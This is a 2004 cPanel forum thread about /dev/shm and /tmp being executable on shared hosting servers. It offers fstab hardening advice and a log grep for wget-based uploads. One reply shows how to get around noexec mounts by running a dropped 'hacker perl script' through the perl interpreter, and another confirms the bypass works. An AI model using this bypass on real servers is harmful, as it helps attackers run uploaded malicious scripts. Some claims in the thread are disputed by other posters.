The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Exploit in /dev/shm

Discussion in 'General Discussion' started by HostDime, Feb 16, 2004.

  1. HostDime

    HostDime Well-Known Member
    PartnerNOC

    Joined:
    Mar 15, 2003
    Messages:
    81
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Orlando, Florida
    New Exploit In Cpanel - Read Asap! - Servers Hackable

    I am the first to post about this new form of getting into a box. Just to think if you have a RedHat box with a default file system like DedicatedNow, then your box is as good as toasted. Your box can have /tmp noexec,nosuid,nodev,nouser! You're still gone.

    /dev/shm.

    Shared Memory. Unfortuantely, by default it has 'defaults' settings, which allow files to be run. To fix this type:

    pico /etc/fstab

    in /dev/shm line, change 'defaults' to 'noexec,nosuid' without the quotes. Hit CTRL + X , and y to save as /etc/fstab, and enter. Now, umount /dev/shm. After mount /dev/shm. Your shm is now secure. Unfortunately, many php scripts are poorly written and are insecure. Check all domlogs for wget, possibly with this command:

    for files in /usr/local/apache/domlogs/*; do grep "wget" $files; done;

    This will check for wget in any files, And help indentifty which insecure files lead to what. I also suggest a process killer such as WatchDog from http://www.webhosting-tools.com. Lane Vance owns the site and is a very good programmer. Watchdog is a CGI script that runs in the background and can also kill files run by nobody for an amount of time or CPU you choose. This will help kill perl scripts executed by /usr/bin/perl in /tmp or /dev/shm. Many perl scripts are out now that run DDOS's and shells. I also suggest downloading APF firewall, and installing if. It you need a good default cpanel conf file, email me at kris@hostdime.com. I can help you install it, secure your server. Unfortuantely Cpanel will never be secure, and you need a security admin these days to make sure your servers are as secure as they can be, and up2date :banana:


    Comments are welcome to this find.
     
  2. StevenC

    StevenC Well-Known Member

    Joined:
    Jan 1, 2004
    Messages:
    254
    Likes Received:
    0
    Trophy Points:
    16
    Re: New Exploit In Cpanel - Read Asap! - Servers Hackable

    Amen to that, its crazy the amount of people still running old kernels. Nice post =)
     
  3. jamesbond

    jamesbond Well-Known Member

    Joined:
    Oct 9, 2002
    Messages:
    738
    Likes Received:
    1
    Trophy Points:
    18
    Why is this a exploit in Cpanel though?

    I'm not a security expert by any means, but IMHO, noexec etc, only offers limited protection. It's still very easy to execute programs from a noexec partition.

    The benefit of this 'security measure' will quickly diminish as long it's so easy to work around it.

    The key is to find a serverwide solution to prevent people from uploading malicious programs in the first place, without affecting the customers on the server.

    I've been playing a bit with mod_security but it's very difficult to come up with rules that are strict enough to be effective without causing (possible) issues for your current customers.
     
  4. chican0

    chican0 Well-Known Member

    Joined:
    Mar 26, 2003
    Messages:
    59
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Los Angeles
    Thanks for the post. Good information here. Appreciate the link too.
     
  5. alex042

    alex042 Well-Known Member

    Joined:
    Sep 13, 2003
    Messages:
    76
    Likes Received:
    0
    Trophy Points:
    6
    Removing files with 'wget' in them will probably break Fantastico if you have that installed. Fantastico requires 'wget' to function properly. It also requires access to wget, so if you have it installed, you can't even disable 'wget'.
     
  6. Curious Too

    Curious Too Well-Known Member

    Joined:
    Aug 31, 2001
    Messages:
    427
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Root Administrator
    Re: New Exploit In Cpanel - Read Asap! - Servers Hackable



    How is this strictly a cPanel exploit?
     
  7. dgbaker

    dgbaker Well-Known Member
    PartnerNOC

    Joined:
    Sep 20, 2002
    Messages:
    2,578
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Toronto, Ontario Canada
    cPanel Access Level:
    DataCenter Provider
    I was thinking that as well. Plus I have never seen any DataCenter or major company use anything but the default for /dev/shm
     
  8. bhaputi

    bhaputi Registered
    PartnerNOC

    Joined:
    Apr 26, 2002
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    1
    BurstNET/Nocster noexec/etc. on /dev/shm for a while now....
     
  9. eth00

    eth00 Well-Known Member
    PartnerNOC

    Joined:
    Mar 30, 2003
    Messages:
    723
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    NC
    cPanel Access Level:
    Root Administrator
    I agree that is all I have ever seen. Wget is bad for many reasons but it so necessary for some stuff to work.

    I think doing this is will lead to more problems then it is worth.
     
  10. formerly_burstdan

    formerly_burstdan Registered

    Joined:
    Jun 18, 2004
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Scranton
    Unless I am misreading this, he is saying to check the logs for which files were pulled using wget, not disabling wget.
     
  11. eth00

    eth00 Well-Known Member
    PartnerNOC

    Joined:
    Mar 30, 2003
    Messages:
    723
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    NC
    cPanel Access Level:
    Root Administrator
    did not read the post all the way, yeah you are right that is what he is talking about doing :)

    It would be interesting to see if anybody has any trouble once they change it to noexec.
     
  12. netwrkr

    netwrkr Well-Known Member

    Joined:
    Apr 12, 2003
    Messages:
    203
    Likes Received:
    0
    Trophy Points:
    16
    I question the posters motives. Since posting in this forum as the "SecurityManager" for "Host Dime", I also see a post at HHO with the same name and title of "President" of another company.

    I have yet to see one shred of evidence that this is a actual issue. I caution people reading this post to -not- rush forward and make the changes suggested on your production servers until you have had a chance to test. The poster should of notified the proper authorities i.e. Linux developers, vendors etc. Only then would the subject matter experts be able to weigh in on the suggested change(s) and the implications -if- this was proven to be a real issue.

    TP
     
  13. dgbaker

    dgbaker Well-Known Member
    PartnerNOC

    Joined:
    Sep 20, 2002
    Messages:
    2,578
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Toronto, Ontario Canada
    cPanel Access Level:
    DataCenter Provider
    TP -

    Hope you're not refering to me? ;)
     
  14. netwrkr

    netwrkr Well-Known Member

    Joined:
    Apr 12, 2003
    Messages:
    203
    Likes Received:
    0
    Trophy Points:
    16
    I was agreeing with you :)

    TP
     
  15. dgbaker

    dgbaker Well-Known Member
    PartnerNOC

    Joined:
    Sep 20, 2002
    Messages:
    2,578
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Toronto, Ontario Canada
    cPanel Access Level:
    DataCenter Provider
    Just checking, I find the whole thing very strange, as one had commented about burst/nocster, well we also have servers with them and they use the default.
     
  16. tvcnet

    tvcnet Well-Known Member
    PartnerNOC

    Joined:
    Aug 15, 2003
    Messages:
    116
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    San Diego
    cPanel Access Level:
    DataCenter Provider
    Try this for fun.

    Put one of those nice hacker perl scripts in your /tmp directory, you know the directory you set to non-execute...

    Then run this in your "secured" directory:
    sh -c cd /var/tmp;/usr/bin/perl yourscript.pl

    Interesting?

    -Jim
     
  17. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    Yup, that's perfectly normal and should be expected.

    noexec doesn't mean that you cannot run a script in /tmp through an interpreter, all it does is stop you running the script directly.

    You can do the exact same thing with a shell script, php script, etc...
     
  18. netwrkr

    netwrkr Well-Known Member

    Joined:
    Apr 12, 2003
    Messages:
    203
    Likes Received:
    0
    Trophy Points:
    16
    amen to that.
     
Loading...

Share This Page